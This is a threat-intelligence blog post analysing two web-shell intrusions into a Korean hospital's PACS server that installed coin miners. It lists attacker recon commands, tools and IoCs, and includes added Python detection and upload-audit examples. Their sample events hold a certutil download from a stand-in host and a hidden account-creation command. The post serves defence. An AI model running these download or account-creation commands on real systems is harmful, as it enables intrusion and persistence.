Analysis of CoinMiner Attacks Targeting Korean Web Servers - ASEC BLOG (2024)

Posted by Sanseo, June 24, 2024

Because web servers are exposed externally to provide web services to any user, they have long been major targets for threat actors. AhnLab SEcurity Intelligence Center (ASEC) monitors attacks against vulnerable web servers that have unpatched vulnerabilities or are poorly managed, and shares the attack cases it confirms through the ASEC Blog.

ASEC recently identified attack cases in which a Korean medical institution was targeted and CoinMiners were installed. The targeted web server was a Windows IIS server, and judging by the path to which the web shells were uploaded, it is presumed to be a system running a Picture Archiving and Communication System (PACS).


PACS is a system for digitally storing and transferring patients' medical images so that they can be reviewed and interpreted regardless of time and place, and it is therefore used by many hospitals. Since there are multiple PACS vendors, each medical institution may use a different PACS product.

Multiple web shell upload attempts were identified on the targeted web server. Although the exact details were not confirmed, it is presumed that the PACS product has a vulnerability or that the administrator did not configure its security settings properly. Because the web shell upload attacks occurred on two separate occasions and no direct correlation was found between them, two different threat actors are believed to have attacked this server a few days apart.

Both attacks are suspected to have been carried out by Chinese-speaking threat actors: many of the tools used, such as Cpolar and RingQ, were developed by Chinese speakers, and Chinese-language comments were identified. Notably, a significant number of attacks targeting vulnerable web servers in Korea are presumed to involve Chinese-speaking threat actors.[1][2][3]


1. First Attack Case

In the initial attack identified, the threat actor used web shells such as Chopper and Behinder. After successfully uploading the web shells, the threat actor used the following commands to collect system information.

> whoami
> ipconfig
> tasklist
> systeminfo
> netstat -ano
> query user
> ping 8.8.8.8

Subsequently, the threat actor installed the privilege escalation tool BadPotato and the proxy tool Cpolar through the uploaded web shells. Cpolar is a tunneling tool, similar to Ngrok, created by a Chinese developer. Such tools are typically used to expose systems located inside a NAT environment to the outside, enabling threat actors to access them remotely via RDP.


The threat actor then installed a CoinMiner, starting by downloading the “1.cab” file. It contained the batch script malware “1.bat”, an XML file for task scheduler registration, and a CoinMiner downloader. The downloader in turn downloads and installs a zip file from an external source.


Chinese-language comments can also be found in the “1.bat” file used to install the CoinMiner. The use of Cpolar, which Chinese users prefer over Ngrok, together with the Chinese comments in the attack script, suggests that the threat actor is a Chinese speaker.


The threat actor used the malware described above to install XMRig, but the download address hosted many more types of malware. Among them were the web shells Caidao and ASPXspy, and, in addition to BadPotato, other privilege escalation tools such as GodPotato, PrintNotifyPotato, and IIS LPE (by k8gege).

Other port forwarding tools besides Cpolar, such as Frpc and Lcx, were also uploaded, along with malware designed to add user accounts for future remote access. When given the name of the account to add as an argument, the “useradd.exe” malware creates the account with a random password and displays the result.

Mining Pool
sinmaxinter[.]top:7005


2. Second Attack Case

The second attack occurred several days after the first attack. Similar to the previous case, the threat actor installed web shells such as Godzilla, Chopper, and Behinder during their initial access process. After successfully uploading the web shells, the threat actor used the following commands to collect system information.

> whoami
> systeminfo
> netstat -ant

A distinctive characteristic of the second attack was the use of Certutil to download additional malware. For privilege escalation, the threat actor installed GodPotato and PrintNotifyPotato along with an exploit for CVE-2021-1732. They installed the Fscan tool and a remote shell to explore the network of the infected system, and Netcat to control it. Unlike the previous case, in which Cpolar, Frpc, and Lcx were used, EarthWorm was used as the proxy tool this time.
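A detection check covering the behaviour described in both cases (recon commands, a Certutil download and account creation spawned from the IIS worker process), added here as an example; it is not part of the original post or any AhnLab tool. It assumes Sysmon-style process-creation records in a constructed pipe-delimited format; the host names, URL and command lines are constructed.

```python
from collections import defaultdict

# Recon programs the post lists as run through the web shells, keyed by executable name.
RECON_PROGRAMS = {"whoami", "ipconfig", "tasklist", "systeminfo", "netstat", "query", "ping"}
WEB_SERVER_PARENT = "w3wp.exe"  # IIS worker process: its children are the web shell's commands

# Constructed Sysmon-style process-creation records (not real telemetry): "timestamp|host|parent_image|command_line"
SAMPLE_EVENTS = """\
2024-06-10T09:01:02|PACS01|C:\\Windows\\System32\\inetsrv\\w3wp.exe|cmd /c whoami
2024-06-10T09:01:05|PACS01|C:\\Windows\\System32\\inetsrv\\w3wp.exe|cmd /c systeminfo
2024-06-10T09:01:09|PACS01|C:\\Windows\\System32\\inetsrv\\w3wp.exe|cmd /c netstat -ano
2024-06-10T09:02:30|PACS01|C:\\Windows\\System32\\inetsrv\\w3wp.exe|cmd /c certutil -urlcache -f http://example.invalid/pp.exe pp.exe
2024-06-10T09:03:00|PACS01|C:\\Windows\\System32\\inetsrv\\w3wp.exe|cmd /c net user svc_backup Xy7!q /add
2024-06-10T09:05:00|PACS02|C:\\Windows\\explorer.exe|cmd /c ipconfig
"""

def parse_event(line):
    ts, host, parent, cmdline = line.split("|", 3)
    return {"ts": ts, "host": host, "parent": parent.rsplit("\\", 1)[-1].lower(), "cmdline": cmdline}

def classify(event):
    """Label one process-creation event; None when the parent is not the IIS worker."""
    if event["parent"] != WEB_SERVER_PARENT:
        return None
    tokens = [t.lower() for t in event["cmdline"].split()]
    if tokens[:2] == ["cmd", "/c"]:
        tokens = tokens[2:]  # the program the web shell actually ran
    prog = (tokens[0] if tokens else "").rsplit("\\", 1)[-1].removesuffix(".exe")
    if prog in RECON_PROGRAMS:
        return "recon"
    if prog == "certutil" and ("-urlcache" in tokens or "-f" in tokens):
        return "lolbin-download"  # Certutil used as a downloader, as in the second case
    if prog == "net" and tokens[1:2] == ["user"] and "/add" in tokens:
        return "account-add"      # same effect as the UserAdder tool in the first case
    return "webshell-child"       # anything else under w3wp.exe is still worth a look

def analyse(raw_events, recon_threshold=3):
    """Per host: count labels and flag web-shell activity on enough recon, any download or account add."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in raw_events.strip().splitlines():
        ev = parse_event(line)
        label = classify(ev)
        if label:
            counts[ev["host"]][label] += 1
    report = {}
    for host, c in counts.items():
        suspected = c["recon"] >= recon_threshold or c["lolbin-download"] or c["account-add"]
        report[host] = {**c, "webshell_suspected": bool(suspected)}
    return report
```

In production the same logic applies to Sysmon Event ID 1 or Security 4688 records; the parent-process filter is what separates web-shell activity from an administrator running the same commands.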


The threat actor also installed Ladon, which offers many of the functions needed during an attack, including scanning, privilege escalation, credential theft, and reverse shells. Ladon was created by a Chinese-speaking developer and is consequently used frequently by Chinese-speaking threat actors.

Another indication that the threat actor is a Chinese speaker is the use of a tool called RingQ. RingQ is an injector that encrypts ordinary malware and tools so that anti-malware products cannot easily detect them, then executes them in memory. The threat actor encrypts the malware with “Create.exe” and distributes the result as “main.txt” to bypass file-based detection by anti-malware products; running RingQ then executes the encrypted “main.txt” in memory.


As in the first case, the threat actor's ultimate goal is to install a CoinMiner. Most of the ASPX files uploaded by the threat actor are web shells, but one ASPX file acts as a downloader: it fetches an additional payload named “aspx.exe” from an external source and executes it. “aspx.exe” is itself a downloader that downloads the XMRig CoinMiner and runs it in memory.



3. Conclusion

Attacks targeting web servers continue to occur, and the recent cases described here targeted a Korean medical institution. The attacks happened twice, several days apart, and various indicators suggest that the threat actors in both instances were Chinese speakers whose ultimate goal was to mine cryptocurrency with a CoinMiner. Remote control was achieved through the installed web shells and NetCat, and given that proxy tools were installed to enable RDP access, data exfiltration by the threat actors is a distinct possibility.

Administrators must check their web servers for file upload vulnerabilities to block the initial access path of web shell uploads in advance. Passwords must also be changed periodically and access control measures put in place to counter lateral movement using stolen account credentials. V3 should also be updated to the latest version so that malware infections can be prevented.
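One concrete form of the upload check recommended above, added here as an example (not from the post or AhnLab): audit a web-reachable upload folder for files IIS would execute, for server code hidden under a harmless extension (the post's shells were parked as .txt), and for anything outside an allow-list. The folder, its file names, the allow-list of PACS content types and the file contents are all constructed assumptions.

```python
import os
import tempfile

# Extensions IIS/ASP.NET executes or interprets if such a file lands in a web-reachable upload folder.
# The post's web shells were .aspx, .ashx and .asmx files; several more were parked as .txt.
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp", ".asax", ".config"}
# Markers that identify ASP.NET server code regardless of the file's extension.
SERVER_CODE_MARKERS = (b"<%@", b'runat="server"')
ALLOWED_EXTENSIONS = {".dcm", ".jpg", ".jpeg", ".png", ".pdf"}  # assumed PACS upload content

def audit_upload_dir(root):
    """Walk an upload directory and return (relative_path, reason) for every suspicious file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as f:
                head = f.read(4096)  # server code directives sit at the top of the file
            if ext in SCRIPT_EXTENSIONS:
                findings.append((rel, "server-executable extension"))
            elif any(m in head for m in SERVER_CODE_MARKERS):
                findings.append((rel, "server code inside a non-script file"))
            elif ext not in ALLOWED_EXTENSIONS:
                findings.append((rel, "extension not on the upload allow-list"))
    return sorted(findings)

def build_sample_dir():
    """Create a constructed upload folder mirroring the post's file naming (not real samples)."""
    root = tempfile.mkdtemp(prefix="pacs_upload_")
    files = {
        "study1.dcm": b"DICM" + b"\x00" * 16,                 # legitimate image data
        "report.pdf": b"%PDF-1.4 ...",
        "1.aspx": b'<%@ Page Language="C#" %>',               # script extension, as 1.aspx/2.aspx
        "aaa.ashx": b'<%@ WebHandler Language="C#" %>',       # handler extension, as aaa.ashx
        "aspx.txt": b'<%@ Page Language="C#" %><script runat="server"></script>',  # parked as .txt
        "good.txt": b"just notes",                            # benign but not on the allow-list
    }
    for name, content in files.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(content)
    return root
```

Pair the audit with IIS request filtering that denies script extensions in the upload path, so a file that slips past the check still cannot be executed.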

File Detection
– WebShell/ASP.Agent.SC200079 (2024.06.17.02)
– WebShell/ASP.Agent.SC199712 (2024.05.24.00)
– WebShell/ASP.Agent.SC199713 (2024.05.24.00)
– WebShell/ASP.Agent.SC199714 (2024.05.24.00)
– WebShell/ASP.Agent (2024.05.24.00)
– Downloader/ASP.Malurl.SC199711 (2024.05.24.00)
– WebShell/JSP.Behinder.SC188179 (2023.05.12.01)
– WebShell/ASP.Generic.S2184 (2023.03.22.03)
– WebShell/ASP.ASpy.S1362 (2021.02.02.07)
– WebShell/ASP.Generic.S1855 (2022.06.16.00)
– WebShell/ASP.Small.S1378 (2021.02.24.02)
– WebShell/ASP.Small.S1400 (2021.03.16.02)
– WebShell/ASP.Generic.S1422 (2021.03.30.03)
– WebShell/ASP.Generic.S1775 (2022.04.14.00)
– HackTool/Win.BadPotato.C4177837 (2023.09.01.00)
– Downloader/Win.Miner.C5626012 (2024.05.27.00)
– Trojan/Win.Potato.C5626014 (2024.05.27.00)
– HackTool/Win.Frpc.C5626022 (2024.05.27.00)
– HackTool/Win.Cpolar.C5641794 (2024.06.17.03)
– Trojan/Win.Miner3.R647471 (2024.05.08.02)
– Unwanted/Win.NSSM.C5625980 (2024.05.27.00)
– Downloader/Win.Miner.C5625979 (2024.05.27.00)
– HackTool/Win.RingQ.C5625987 (2024.05.27.00)
– Dropper/Win.Generic.C5624814 (2024.05.24.00)
– Trojan/Win.Generic.C5501120 (2023.10.06.03)
– Trojan/Win.AddUser.R649913 (2024.05.27.00)
– Trojan/Win.Generic.C5584377 (2024.02.05.02)
– Trojan/Win.MSILMamut.C5410538 (2023.04.13.01)
– HackTool/Win.Cpolar.C5641787 (2024.06.17.03)
– Exploit/Win.PrintNotifyPotato.R561362 (2023.08.14.00)
– HackTool/Win.Frpc.C5641788 (2024.06.17.03)
– HackTool/Win.Htran.C5626020 (2024.05.27.00)
– Exploit/Win.Consoler.R548809 (2023.01.05.03)
– HackTool/Win.LCX.C5626011 (2024.05.27.00)
– HackTool/Win32.Earthworm.C2185399 (2017.10.10.07)
– HackTool/Win.Netcat.C5355532 (2023.01.11.02)
– HackTool/Win.Netcat.C5283500 (2022.10.18.03)
– Trojan/XML.Runner (2024.06.18.00)
– CoinMiner/BAT.Agent (2024.06.18.00)
– Trojan/BAT.AddUser (2024.06.18.00)
– HackTool/Script.Frpc (2024.06.18.00)

Behavior Detection
– Malware/MDP.Download.M1900
– Execution/MDP.NetCat.M4516

IoC

C&C Server URLs
– 14.19.214[.]36:6666: NetCat
– 14.19.214[.]36:3333: NetCat
– 1.119.3[.]28:7455: Frpc

